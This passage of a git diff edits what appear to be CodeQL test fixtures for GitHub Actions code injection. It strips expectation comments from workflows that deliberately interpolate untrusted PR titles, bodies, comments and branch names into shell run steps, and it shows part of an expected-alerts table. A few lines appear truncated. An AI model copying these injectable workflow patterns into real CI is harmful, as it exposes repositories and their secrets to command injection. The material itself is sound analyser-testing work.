Source[actions/code-injection/critical] - - run: echo "${{ env.TITLE }}" # $ Alert[actions/code-injection/critical] + echo "TITLE=$PR_TITLE" >> "$GITHUB_ENV" + - run: echo "${{ env.TITLE }}" diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test16.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test16.yml index bf5346b330d5..0b3002506a14 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test16.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test16.yml @@ -30,7 +30,7 @@ jobs: run_id: ${{ github.event.workflow_run.id }} name: pr-id - - name: get PR id # $ Source[actions/code-injection/critical] + - name: get PR id id: pr run: echo "value=$(> $GITHUB_OUTPUT @@ -42,7 +42,7 @@ jobs: run_id: ${{ github.event.workflow_run.id }} name: pr-ref - - name: get PR ref # $ Source[actions/code-injection/critical] + - name: get PR ref id: ref run: echo "value=$(> $GITHUB_OUTPUT @@ -122,7 +122,7 @@ jobs: - name: Get commit message id: commit-message - run: echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT # $ Source[actions/code-injection/critical] + run: echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT # ================= Deploy Demo ================= - name: 📦 Build demo @@ -227,5 +227,5 @@ jobs: "📑 Examples": "${{ needs.build-demo.outputs.preview-url }}/", "📚 Storybook": "${{ needs.build-storybook.outputs.preview-url }}/" } - } # $ Alert[actions/code-injection/critical] + } diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test17.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test17.yml index 712c6fb8100f..559c69c4710f 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test17.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test17.yml @@ -19,10 +19,10 @@ jobs: route: GET /repos/${{ github.repository }}/pulls/${{ github.event.issue.number }} env: GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} - - name: Set PR source branch as env variable # $ Source[actions/code-injection/critical] + - name: Set PR source branch as env variable if: github.event_name == 'issue_comment' run: | - PR_SOURCE_BRANCH=$(echo '${{ steps.get-pr.outputs.data }}' | jq -r '.head.ref') # $ Alert[actions/code-injection/critical] + PR_SOURCE_BRANCH=$(echo '${{ steps.get-pr.outputs.data }}' | jq -r '.head.ref') echo "BRANCH=$PR_SOURCE_BRANCH" >> $GITHUB_ENV setup2: runs-on: ubuntu-latest @@ -36,13 +36,13 @@ jobs: pull_number: ${{ github.event.issue.number }} env: GITHUB_TOKEN: ${{ secrets.GH_TOKEN }} - - name: Set environment variables # $ Source[actions/code-injection/critical] + - name: Set environment variables run: | MERGE_STATUS=${{ fromJson(steps.get-pr-details.outputs.data).mergeable }} if $MERGE_STATUS; then echo "COMMENT=\[Fast Forward CI\] ${{ env.HEAD_REF }} cannot be merged into ${{ env.BASE_REF }} at the moment." >> $GITHUB_ENV; fi echo "MERGE_STATUS=$MERGE_STATUS" >> $GITHUB_ENV echo "BASE_REF=${{ fromJson(steps.get-pr-details.outputs.data).base.ref }}" >> $GITHUB_ENV - echo "HEAD_REF=${{ fromJson(steps.get-pr-details.outputs.data).head.ref }}" >> $GITHUB_ENV # $ Alert[actions/code-injection/critical] + echo "HEAD_REF=${{ fromJson(steps.get-pr-details.outputs.data).head.ref }}" >> $GITHUB_ENV setup3: runs-on: ubuntu-latest steps: @@ -52,8 +52,8 @@ jobs: route: GET /repos/${{ github.repository_owner }}/${{ github.repository }}/issues?state=open env: GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN}} - - run: | # $ Source[actions/code-injection/critical] - echo '${{ steps.issues.outputs.data }}' > issues.json # $ Alert[actions/code-injection/critical] + - run: | + echo '${{ steps.issues.outputs.data }}' > issues.json setup4: runs-on: ubuntu-latest steps: @@ -65,10 +65,10 @@ jobs: repo: bar pull_number: ${{ github.event.issue.number }} - - run: >- # $ Source[actions/code-injection/critical] + - run: >- echo "Pull request title is \"${{ fromJson(steps.get-pull-request.outputs.data).title }}\" but expected - \"Updated test pull request\"" && exit 1 # $ Alert[actions/code-injection/critical] + \"Updated test pull request\"" && exit 1 diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test18.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test18.yml index ba51066def8b..552ad866b5ae 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test18.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test18.yml @@ -13,9 +13,9 @@ jobs: env: GITHUB_TOKEN: ${{ secrets.GITHUBACTIONS_TOKEN }} - - name: Write issues to file # $ Source[actions/code-injection/critical] + - name: Write issues to file run: | - echo '${{ steps.issues.outputs.data }}' > issues.json # $ Alert[actions/code-injection/critical] + echo '${{ steps.issues.outputs.data }}' > issues.json - name: Setup Node.js uses: actions/setup-node@v2 diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test19.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test19.yml index 9ee26e0d6265..2773c1044db1 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test19.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test19.yml @@ -10,102 +10,102 @@ jobs: - id: head_ref run: | HEAD_REF=$(gh pr view "${{ github.event.issue.number }}" --json headRefName -q '.headRefName') - echo "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] - - run: echo "${{ steps.head_ref.outputs.head_ref}}" # $ Alert[actions/code-injection/critical] + echo "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.head_ref.outputs.head_ref}}" - id: title run: | TITLE=$(gh pr view $PR_NUMBER --json title --jq .title) - echo "title=$TITLE" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] - - run: echo "${{ steps.title.outputs.title}}" # $ Alert[actions/code-injection/critical] + echo "title=$TITLE" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.title.outputs.title}}" - id: body run: | BODY=$(gh pr view $PR_NUMBER --json body --jq .body) - echo "body=$BODY" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] - - run: echo "${{ steps.body.outputs.body}}" # $ Alert[actions/code-injection/critical] + echo "body=$BODY" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.body.outputs.body}}" - id: comments run: | COMMENTS="$(gh pr view --repo ${{ github.repository }} "$PR_NUMBER" --json "body,comments" -q '.body, .comments[].body')" - echo "comments=$COMMENTS" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] - - run: echo "${{ steps.comments.outputs.comments}}" # $ Alert[actions/code-injection/critical] + echo "comments=$COMMENTS" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.comments.outputs.comments}}" - id: files run: | CHANGED_FILES="$(gh pr view --repo ${{ github.repository }} ${{ needs.check-comment.outputs.pull_number }} --json files --jq '.files.[].path')" - echo "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] - - run: echo "${{ steps.files.outputs.files}}" # $ Alert[actions/code-injection/critical] + echo "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.files.outputs.files}}" - id: author run: | AUTHOR=$(gh pr view ${ORI_PR} -R ${REPO} --json author -q '.author.login') - echo "author=$AUTHOR" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] - - run: echo "${{ steps.author.outputs.author}}" # $ Alert[actions/code-injection/critical] + echo "author=$AUTHOR" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.author.outputs.author}}" pulls2: runs-on: ubuntu-latest steps: - id: head_ref run: | HEAD_REF=$(gh api -H 'Accept: application/vnd.github+json' /repos/test/test/commits/${{ env.sui_sha }}/pulls --jq '.[].head.ref' | head -n 1) - echo "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] - - run: echo "${{ steps.head_ref.outputs.head_ref}}" # $ Alert[actions/code-injection/critical] + echo "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.head_ref.outputs.head_ref}}" - id: title run: | TITLE=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".title") - echo "title=$TITLE" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] - - run: echo "${{ steps.title.outputs.title}}" # $ Alert[actions/code-injection/critical] + echo "title=$TITLE" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.title.outputs.title}}" - id: body run: | BODY=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".body") - echo "body=$BODY" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] - - run: echo "${{ steps.body.outputs.body}}" # $ Alert[actions/code-injection/critical] + echo "body=$BODY" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.body.outputs.body}}" - id: comments run: | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body') - echo "comments=$COMMENTS" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] - - run: echo "${{ steps.comments.outputs.comments}}" # $ Alert[actions/code-injection/critical] + echo "comments=$COMMENTS" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.comments.outputs.comments}}" - id: files run: | CHANGED_FILES=$(gh api /repos/test/test/pulls/${{PR_NUMBER}}/files --jq '.[].filename') - echo "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] - - run: echo "${{ steps.files.outputs.files}}" # $ Alert[actions/code-injection/critical] + echo "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.files.outputs.files}}" - id: author run: | AUTHOR=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".user.login") - echo "author=$AUTHOR" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] - - run: echo "${{ steps.author.outputs.author}}" # $ Alert[actions/code-injection/critical] + echo "author=$AUTHOR" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.author.outputs.author}}" issues1: runs-on: ubuntu-latest steps: - id: title run: | TITLE=$(gh issue view "$ISSUE_NUMBER" --json title --jq '.title') - echo "title=$TITLE" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] - - run: echo "${{ steps.title.outputs.title}}" # $ Alert[actions/code-injection/critical] + echo "title=$TITLE" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.title.outputs.title}}" - id: body run: | BODY=$(gh issue view -R ${GITHUB_REPOSITORY} ${ORIGINAL_ISSUE_NUMBER} --json title,body --jq '.body') - echo "body=$BODY" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] - - run: echo "${{ steps.body.outputs.body}}" # $ Alert[actions/code-injection/critical] + echo "body=$BODY" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.body.outputs.body}}" - id: comments run: | COMMENTS=$(gh issue view "$ISSUE_NUMBER" --json comments --jq '.comments[].body') - echo "comments=$COMMENTS" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] - - run: echo "${{ steps.comments.outputs.comments}}" # $ Alert[actions/code-injection/critical] + echo "comments=$COMMENTS" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.comments.outputs.comments}}" issues2: runs-on: ubuntu-latest steps: - id: title run: | TITLE=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".title") - echo "title=$TITLE" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] - - run: echo "${{ steps.title.outputs.title}}" # $ Alert[actions/code-injection/critical] + echo "title=$TITLE" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.title.outputs.title}}" - id: body run: | BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body") - echo "body=$BODY" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] - - run: echo "${{ steps.body.outputs.body}}" # $ Alert[actions/code-injection/critical] + echo "body=$BODY" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.body.outputs.body}}" - id: comments run: | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body') - echo "comments=$COMMENTS" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] - - run: echo "${{ steps.comments.outputs.comments}}" # $ Alert[actions/code-injection/critical] + echo "comments=$COMMENTS" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.comments.outputs.comments}}" pulls3: runs-on: ubuntu-latest steps: @@ -113,20 +113,20 @@ jobs: run: | DETAILS=$(gh pr view $PR_NUMBER --json "title,author,headRefName") TITLE=$(echo $DETAILS | jq -r '.title') - echo "title=$TITLE" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] - - run: echo "${{ steps.title1.outputs.title}}" # $ Alert[actions/code-injection/critical] + echo "title=$TITLE" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.title1.outputs.title}}" - id: title2 run: | TITLE=$(gh pr view $PR_NUMBER --json "title,author,headRefName") TITLE=$(echo $TITLE | jq -r '.title') - echo "title=$TITLE" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] - - run: echo "${{ steps.title2.outputs.title}}" # $ Alert[actions/code-injection/critical] + echo "title=$TITLE" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.title2.outputs.title}}" - id: title3 run: | TITLE=$(gh issue view "$ISSUE_NUMBER" --json title,author) TITLE=$(echo $TITLE | jq -r '.title') - echo "title=$TITLE" >> "$GITHUB_OUTPUT" # $ Source[actions/code-injection/critical] - - run: echo "${{ steps.title3.outputs.title}}" # $ Alert[actions/code-injection/critical] + echo "title=$TITLE" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.title3.outputs.title}}" diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test2.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test2.yml index 5bca1705b9db..03ee63fe9cf4 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test2.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test2.yml @@ -22,9 +22,9 @@ jobs: filters: | locale: - '*.xml' - - name: Changed files 1 # $ Source[actions/code-injection/critical] + - name: Changed files 1 run: | - echo changed: ${{ steps.changed.outputs.locale_files }} # $ Alert[actions/code-injection/critical] + echo changed: ${{ steps.changed.outputs.locale_files }} echo changed: ${{ steps.changed.outputs.changes }} - name: Check for relevant changes uses: dorny/paths-filter@v3 @@ -34,9 +34,9 @@ jobs: filters: | locale: - '*.xml' - - name: Changed files 2 # $ Source[actions/code-injection/critical] + - name: Changed files 2 run: | - echo changed:${{ steps.changed2.outputs.locale_files }} # $ Alert[actions/code-injection/critical] + echo changed:${{ steps.changed2.outputs.locale_files }} echo changed: ${{ steps.changed2.outputs.changes }} - name: Check for relevant changes uses: dorny/paths-filter@v3 diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test20.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test20.yml index 9f906d507cfe..27d8a666fc9e 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test20.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test20.yml @@ -12,7 +12,7 @@ jobs: echo " " echo "github.ref = ${{ github.ref }}" echo "github.sha = ${{ github.sha }}" - echo "github.event.pull_request.head.ref = ${{ github.event.pull_request.head.ref }}" # $ Alert[actions/code-injection/medium] + echo "github.event.pull_request.head.ref = ${{ github.event.pull_request.head.ref }}" echo "github.event.pull_request.head.sha = ${{ github.event.pull_request.head.sha }}" echo "github.event.pull_request.base.ref = ${{ github.event.pull_request.base.ref }}" echo "github.event.pull_request.base.sha = ${{ github.event.pull_request.base.sha }}" diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test21.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test21.yml index 292891b8ccb4..03ecc20de86a 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test21.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test21.yml @@ -19,6 +19,6 @@ jobs: id: extract_info shell: bash run: | - echo "version=$( echo "${{ github.event.head_commit.message }}" | sed 's/^release: v\([0-9]\+\.[0-9]\+\.[0-9]\+\).*$/\1/' )" >> $GITHUB_OUTPUT # $ Alert[actions/code-injection/medium] - echo "pr_number=$( echo "${{ github.event.head_commit.message }}" | sed 's/.*(\#\([0-9]\+\)).*$/\1/' )" >> $GITHUB_OUTPUT # $ Alert[actions/code-injection/medium] - echo "release_branch=release/v$( echo "${{ github.event.head_commit.message }}" | sed 's/^release: v\([0-9]\+\.[0-9]\+\).*$/\1/' )" >> $GITHUB_OUTPUT # $ Alert[actions/code-injection/medium] + echo "version=$( echo "${{ github.event.head_commit.message }}" | sed 's/^release: v\([0-9]\+\.[0-9]\+\.[0-9]\+\).*$/\1/' )" >> $GITHUB_OUTPUT + echo "pr_number=$( echo "${{ github.event.head_commit.message }}" | sed 's/.*(\#\([0-9]\+\)).*$/\1/' )" >> $GITHUB_OUTPUT + echo "release_branch=release/v$( echo "${{ github.event.head_commit.message }}" | sed 's/^release: v\([0-9]\+\.[0-9]\+\).*$/\1/' )" >> $GITHUB_OUTPUT diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test24.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test24.yml index 3661cd885a44..c1846b8f51ec 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test24.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test24.yml @@ -14,6 +14,6 @@ jobs: label_marker_start: '>>' label_marker_end: '<<' - - name: Show parsed data JSON # $ Source[actions/code-injection/critical] + - name: Show parsed data JSON run: | - echo ${{ steps.parse.outputs.payload }} # $ Alert[actions/code-injection/critical] + echo ${{ steps.parse.outputs.payload }} diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test25.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test25.yml index 5cf1093c8bbc..0bd666dc9485 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test25.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test25.yml @@ -9,5 +9,5 @@ jobs: - name: Issue Forms Body Parser id: parse uses: zentered/issue-forms-body-parser@v2.0.0 - - run: echo ${{ steps.parse.outputs.data }} # $ Alert[actions/code-injection/critical] Source[actions/code-injection/critical] - - run: echo ${{ toJSON(steps.parse.outputs.data) }} # $ Alert[actions/code-injection/critical] + - run: echo ${{ steps.parse.outputs.data }} + - run: echo ${{ toJSON(steps.parse.outputs.data) }} diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test26.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test26.yml index 532ce731d104..8648d86983ee 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test26.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test26.yml @@ -17,7 +17,7 @@ jobs: - name: Fetch the issue id: read_issue_body run: - echo "body=$(gh issue view ${{ inputs.issue_number }} --repo ${{ github.repository }} --json body --jq '.body')" >> $GITHUB_OUTPUT # $ Source[actions/code-injection/critical] + echo "body=$(gh issue view ${{ inputs.issue_number }} --repo ${{ github.repository }} --json body --jq '.body')" >> $GITHUB_OUTPUT - name: Issue Forms Body Parser id: parse @@ -25,5 +25,5 @@ jobs: with: body: ${{ steps.read_issue_body.outputs.body }} - - run: echo ${{ steps.parse.outputs.data }} # $ Alert[actions/code-injection/critical] - - run: echo ${{ toJSON(steps.parse.outputs.data) }} # $ Alert[actions/code-injection/critical] + - run: echo ${{ steps.parse.outputs.data }} + - run: echo ${{ toJSON(steps.parse.outputs.data) }} diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test27.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test27.yml index 86e76277f6e9..e9ba77c0f939 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test27.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test27.yml @@ -38,7 +38,7 @@ jobs: persist-credentials: false ref: ${{ steps.get-sha.outputs.sha }} fetch-depth: 0 - - name: Get version # $ Source[actions/code-injection/critical] + - name: Get version id: get-version run: | echo "chart_version=$(> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | ${{ steps.git-commit.outputs.file-list }} | .github/workflows/test22.yml:2:3:2:14 | workflow_run | workflow_run | -| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | ${{ env.log }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | ${{ env.prev_log }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | ${{ steps.trim-url.outputs.trimmed_url }} | .github/workflows/image_link_generator.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | ${{ github.event.issue.title }} | .github/workflows/issues.yaml:1:5:1:10 | issues | issues | -| .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/issues.yaml:1:5:1:10 | issues | issues | -| .github/workflows/issues.yaml:15:19:15:39 | env.global_env | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | ${{ env.global_env }} | .github/workflows/issues.yaml:1:5:1:10 | issues | issues | -| .github/workflows/issues.yaml:17:19:17:36 | env.job_env | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | ${{ env.job_env }} | .github/workflows/issues.yaml:1:5:1:10 | issues | issues | -| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | ${{ env.step_env }} | .github/workflows/issues.yaml:1:5:1:10 | issues | issues | -| .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/json_wrap.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | ${{ toJSON(github.event.issue.title)}} | .github/workflows/json_wrap.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/level0.yml:3:3:3:8 | issues | issues | -| .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/level0.yml:5:3:5:15 | issue_comment | issue_comment | -| .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/level0.yml:5:3:5:15 | issue_comment | issue_comment | -| .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/level1.yml:3:3:3:14 | workflow_run | workflow_run | -| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | -| .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | -| .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | -| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user ($@). | 